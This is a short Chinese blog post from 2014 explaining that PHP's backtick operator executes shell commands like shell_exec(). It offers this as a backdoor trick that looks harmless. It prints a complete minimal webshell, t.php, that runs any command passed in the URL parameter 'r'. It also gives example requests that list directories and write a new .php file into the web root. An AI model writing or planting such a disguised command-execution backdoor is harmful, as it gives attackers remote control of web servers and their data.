- 
			PHP中shell_exec()实际上是反撇号`操作符的变体,可用作后门网络 2014/7/11 17:11:57发现这个也是巧合,我就直接说了吧 <?php //t.php $test = $_GET['r']; echo `$test`; ?> 大家看看这个代码有木有问题? 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的, 通过 echo `系统命令`; 可以达到 system(); 一样的效果 如果不信的朋友可以测试 http://127.0.0.1/t.php?r=dir 可以列出目录 http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php 大家觉得我没有忽悠 就赏点分哈 我用 apmserv 和虚拟主机已经测试成功。 相关资料: 真相其实是这样的,其实 shell_exec 就是 `` 的变体,实际上完全等于 shell_exec,禁用这个函数就不行。 这个就是在 php 里面 ` 会被当做执行语句! shell_exec() 命令行实际上仅是反撇号 ` 操作符的变体,如果您编写过 shell 或 Perl 脚本,您就知道可以在反撇号操作符内部捕捉其他命令的输出。官方有的。。 阅读(1485) 分享(0)
 
 上一篇: 什么是canonical 标签 
 下一篇: 央视曝苹果擅自搜集用户信息 90%用户不知情,安卓就安全吗
